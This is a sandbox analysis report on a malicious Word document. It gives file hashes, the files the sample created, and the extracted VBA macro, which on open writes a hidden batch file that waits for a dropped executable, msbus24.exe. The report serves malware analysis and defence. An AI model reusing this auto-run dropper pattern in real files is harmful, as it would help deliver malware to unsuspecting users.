Password Protected Microsoft Word Document Analysis | Files
Try VMRay Analyzer
File Information
Sample files count 1
Created files count 7
Modified files count 2
c:\users\hjrd1koky ds8lujv\desktop\3a813df1c8f1e835cc98dd60b799c64e61db51a259ee30b7235004ccb3c9df64.doc
-
File Properties
Names c:\users\hjrd1koky ds8lujv\desktop\3a813df1c8f1e835cc98dd60b799c64e61db51a259ee30b7235004ccb3c9df64.doc (Sample File)
Size 25.50 KB (26112 bytes)
Hash Values MD5: 52ecd34af06455f0cd252661db1ab097
SHA1: 50011011d34e3bcd80672cc91de8c6bd5a2be52e
SHA256: 3a813df1c8f1e835cc98dd60b799c64e61db51a259ee30b7235004ccb3c9df64
Actions
VBA Information
+
VBA Properties
Module Count 1
Macro Count 1
ThisDocument.cls - Open Document
+ 
Private Sub Document_Open()

    Set fs = CreateObject("Scripting.FileSystemObject")
    Set a = fs.CreateTextFile(Environ("temp") + "\test.bat", True)
    
    a.WriteLine ("@echo off")
    a.WriteLine ("set num=0")
    a.WriteLine (":checkexist")
    a.WriteLine ("IF NOT EXIST " + Environ("temp") + "\msbus24.exe if %num% LEQ 20 (")
    a.WriteLine (UserForm1.Label1.Caption)
    a.WriteLine ("TIMEOUT /t 20 /nobreak")
    a.WriteLine ("set /a num+=1")
    a.WriteLine ("GOTO checkexist )")
    a.WriteLine (":zipexist")
    a.Close
    
    Shell Environ("temp") + "\test.bat", vbHide
    
End Sub
c:\users\hjrd1k~1\appdata\local\temp\test.bat
-
File Properties
Names c:\users\hjrd1k~1\appdata\local\temp\test.bat (Created File)
Size 0.34 KB (351 bytes)
Hash Values MD5: 855f89d5ae86649d772ae945ccdf5084
SHA1: 4ca8a6d7c6e2f1f277c1c99d7f287891f12604bd
SHA256: 1bc95054ee38df7db4c4208af2b71eac74d4ce3a1f37403f9a56f68cac31668d
Actions
c:\users\hjrd1k~1\appdata\local\temp\cab1dfb.tmp, ...
-
File Properties
Names c:\users\hjrd1k~1\appdata\local\temp\cab1dfb.tmp (Created File)
c:\users\hjrd1k~1\appdata\local\temp\tar1dfc.tmp (Created File)
c:\users\hjrd1k~1\appdata\local\temp\cab1e6a.tmp (Created File)
c:\users\hjrd1k~1\appdata\local\temp\tar1e6b.tmp (Created File)
c:\users\hjrd1k~1\appdata\local\temp\cab35d2.tmp (Created File)
c:\users\hjrd1k~1\appdata\local\temp\tar35d3.tmp (Created File)
c:\users\hjrd1koky ds8lujv\appdata\local\temp\msbus24.exe (Created File)
Size 0.00 KB (0 bytes)
Hash Values MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
c:\users\hjrd1k~1\appdata\local\temp\cab1dfb.tmp, ...
-
File Properties
Names c:\users\hjrd1k~1\appdata\local\temp\cab1dfb.tmp (Created File)
c:\users\hjrd1k~1\appdata\local\temp\cab1e6a.tmp (Created File)
Size 51.38 KB (52608 bytes)
Hash Values MD5: ff9672cd98bf5d41722d2d1207344c67
SHA1: 98ebe6d49d1d9d4add4bf9219fe2ded40cba33f3
SHA256: 756f4d557302e49bce6623db9bd324c7b05c36b8bb884bbefbbe6b7f53422a54
Actions
c:\users\hjrd1k~1\appdata\local\temp\tar1dfc.tmp, ...
-
File Properties
Names c:\users\hjrd1k~1\appdata\local\temp\tar1dfc.tmp (Created File)
c:\users\hjrd1k~1\appdata\local\temp\tar1e6b.tmp (Created File)
Size 122.35 KB (125286 bytes)
Hash Values MD5: 8237156ad13c2cd7c5cc2faa6969fd86
SHA1: e5481457795650900ee04db955c87224e2db32f0
SHA256: 1a9094d2695f9bfbbf047639227e94f9e838cb0bee18e14b1aed00054faef825
Actions
c:\users\hjrd1koky ds8lujv\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015
-
File Properties
Names c:\users\hjrd1koky ds8lujv\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015 (Modified File)
Size 0.34 KB (344 bytes)
Hash Values MD5: 96b91c3aa1e304f9f1e5330e1ced1f15
SHA1: fdd22e500e3d7d3f9464de971449d31789c26f8f
SHA256: 3e9741fc1d84a8d2fdbb3d58512b1729d75ce116711fc664f6bf52642e433d3d
Actions
c:\users\hjrd1k~1\appdata\local\temp\cab35d2.tmp
-
File Properties
Names c:\users\hjrd1k~1\appdata\local\temp\cab35d2.tmp (Created File)
Size 51.73 KB (52967 bytes)
Hash Values MD5: 26763abb95381e4931c194e34023c33a
SHA1: e1b8114caa3a6b173c2e04e356a5065e7b2ca968
SHA256: 49f2686e30a59fabf11db1234c377497cf09e941ff50a0346854d087e8b08587
Actions
c:\users\hjrd1k~1\appdata\local\temp\tar35d3.tmp
-
File Properties
Names c:\users\hjrd1k~1\appdata\local\temp\tar35d3.tmp (Created File)
Size 123.21 KB (126167 bytes)
Hash Values MD5: 0dab7711a89d642ffe6ea216d92e56c1
SHA1: f2295d85679189d4fc1aac7c761be81447299ec5
SHA256: 163a6d7aaf9374ae4f1b4ee744a906b68da772aaa22095b4ecae709fb6d889e5
Actions
c:\users\hjrd1koky ds8lujv\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015
-
File Properties
Names c:\users\hjrd1koky ds8lujv\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015 (Modified File)
Size 0.34 KB (344 bytes)
Hash Values MD5: 0134df8e2b4d52d156721c444cf96cb5
SHA1: 528e03a25cbd2530d36bea604c4558b239e01c31
SHA256: 0581e2081709fc97843a4ed093c4de023a971ff449492d41239895b30a387b14
Actions
c:\users\hjrd1k~1\appdata\local\temp\~dfc85a57e507447d72.tmp
-
File Properties
Names c:\users\hjrd1k~1\appdata\local\temp\~dfc85a57e507447d72.tmp (Created File)
Size 0.50 KB (512 bytes)
Hash Values MD5: bf619eac0cdf3f68d496ea9344137e8b
SHA1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5
SHA256: 076a27c79e5ace2a3d47f9dd2e83e4ff6ea8872b3c2218f66c92b89b55f36560
Actions
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefox with deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image